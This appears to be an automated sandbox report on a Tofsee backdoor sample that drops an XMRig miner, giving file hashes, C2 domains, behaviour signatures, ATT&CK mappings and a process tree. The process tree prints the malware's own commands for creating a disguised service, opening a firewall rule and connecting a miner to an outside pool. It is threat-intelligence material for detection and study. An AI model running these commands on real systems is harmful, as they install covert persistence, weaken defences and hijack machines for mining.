Overview

overview

10

Static

static

dridex

windows10_x64

10

Analysis

  • max time kernel
    152s
  • max time network
    151s
  • platform
    windows10_x64
  • resource
    win10-en-20211104
  • submitted
    27-11-2021 08:56

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    0428125808208688f048820edba8be134d27861b5af8e8af6a178a88846cdde2.exe

  • Size

    315KB

  • MD5

    ac7988f4e59d807f41a4a2163538fd46

  • SHA1

    ab29b1ea7a76e8c9dfb61a8827e3c617416df95f

  • SHA256

    0428125808208688f048820edba8be134d27861b5af8e8af6a178a88846cdde2

  • SHA512

    cd9441be653eac1eb54647abbca76162abdf2618b44ded7b710e9a5fb5af5a1f4bb221f1e85e4ede43c66ea60e0a82d2ce627414b93f731478f9c5fff2cf5130

Score
10/10
tofseexmrigevasionminerpersistencetrojan

Malware Config

Extracted

Family

tofsee

C2

quadoil.ru

lakeflex.ru

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • Windows security bypass 2 TTPs
    evasiontrojan
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner Payload 3 IoCs
    miner
  • Creates new service(s) 1 TTPs
    persistence
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Sets service image path in registry 2 TTPs
    persistence
  • Deletes itself 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0428125808208688f048820edba8be134d27861b5af8e8af6a178a88846cdde2.exe
    "C:\Users\Admin\AppData\Local\Temp\0428125808208688f048820edba8be134d27861b5af8e8af6a178a88846cdde2.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2668
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ktxptifj\
      2⤵
        PID:3428
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\cvgwhexq.exe" C:\Windows\SysWOW64\ktxptifj\
        2⤵
          PID:424
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create ktxptifj binPath= "C:\Windows\SysWOW64\ktxptifj\cvgwhexq.exe /d\"C:\Users\Admin\AppData\Local\Temp\0428125808208688f048820edba8be134d27861b5af8e8af6a178a88846cdde2.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:848
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description ktxptifj "wifi internet conection"
            2⤵
              PID:4020
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start ktxptifj
              2⤵
                PID:804
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:984
              • C:\Windows\SysWOW64\ktxptifj\cvgwhexq.exe
                C:\Windows\SysWOW64\ktxptifj\cvgwhexq.exe /d"C:\Users\Admin\AppData\Local\Temp\0428125808208688f048820edba8be134d27861b5af8e8af6a178a88846cdde2.exe"
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:4040
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe
                  2⤵
                  • Deletes itself
                  • Drops file in System32 directory
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  • Suspicious use of WriteProcessMemory
                  PID:1288
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                    3⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4000

              Network

              MITRE ATT&CK Matrix ATT&CK v6

              Initial Access

              Execution

              Persistence

              New Service

              1
              T1050

              Modify Existing Service

              1
              T1031

              Registry Run Keys / Startup Folder

              1
              T1060

              Privilege Escalation

              New Service

              1
              T1050

              Defense Evasion

              Disabling Security Tools

              1
              T1089

              Modify Registry

              2
              T1112

              Credential Access

              Discovery

              System Information Discovery

              1
              T1082

              Lateral Movement

              Collection

              Exfiltration

              Command and Control

              Impact

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\cvgwhexq.exe
                MD5

                e69af9d3ee1c8e2c8f9be3b4eb2d708a

                SHA1

                f5358dc7bad45d2b5b20ed07a1fc5784dc31b434

                SHA256

                9fc6db594ad85065e7d64617eec74f24c3a71d9d4e2dfe286af9802b1542d736

                SHA512

                521e638a53303ac6543d13eafd6867a235eca15623cc77819c80e0daa3bed09a7ca34236d9361891ce88180f2d65be42e4825442d185c00ddcae3094c3bc6a74

                Download Submit
              • C:\Windows\SysWOW64\ktxptifj\cvgwhexq.exe
                MD5

                e69af9d3ee1c8e2c8f9be3b4eb2d708a

                SHA1

                f5358dc7bad45d2b5b20ed07a1fc5784dc31b434

                SHA256

                9fc6db594ad85065e7d64617eec74f24c3a71d9d4e2dfe286af9802b1542d736

                SHA512

                521e638a53303ac6543d13eafd6867a235eca15623cc77819c80e0daa3bed09a7ca34236d9361891ce88180f2d65be42e4825442d185c00ddcae3094c3bc6a74

                Download Submit
              • memory/424-122-0x0000000000000000-mapping.dmp
                Download
              • memory/804-126-0x0000000000000000-mapping.dmp
                Download
              • memory/848-124-0x0000000000000000-mapping.dmp
                Download
              • memory/984-128-0x0000000000000000-mapping.dmp
                Download
              • memory/1288-136-0x0000000000BA0000-0x0000000000BB5000-memory.dmp
                Filesize

                84KB

                Download
              • memory/1288-134-0x0000000000AB0000-0x0000000000AB1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/1288-131-0x0000000000BA0000-0x0000000000BB5000-memory.dmp
                Filesize

                84KB

                Download
              • memory/1288-133-0x0000000000AB0000-0x0000000000AB1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/1288-132-0x0000000000BA9A6B-mapping.dmp
                Download
              • memory/2668-118-0x0000000003546000-0x0000000003557000-memory.dmp
                Filesize

                68KB

                Download
              • memory/2668-119-0x00000000034A0000-0x00000000034B3000-memory.dmp
                Filesize

                76KB

                Download
              • memory/2668-121-0x0000000000400000-0x000000000322A000-memory.dmp
                Filesize

                46.2MB

                Download
              • memory/3428-120-0x0000000000000000-mapping.dmp
                Download
              • memory/4000-137-0x00000000030E0000-0x00000000031D1000-memory.dmp
                Filesize

                964KB

                Download
              • memory/4000-141-0x000000000317259C-mapping.dmp
                Download
              • memory/4000-142-0x00000000030E0000-0x00000000031D1000-memory.dmp
                Filesize

                964KB

                Download
              • memory/4020-125-0x0000000000000000-mapping.dmp
                Download
              • memory/4040-129-0x0000000003501000-0x0000000003511000-memory.dmp
                Filesize

                64KB

                Download
              • memory/4040-130-0x0000000003230000-0x000000000337A000-memory.dmp
                Filesize

                1.3MB

                Download
              • memory/4040-135-0x0000000000400000-0x000000000322A000-memory.dmp
                Filesize

                46.2MB

                Download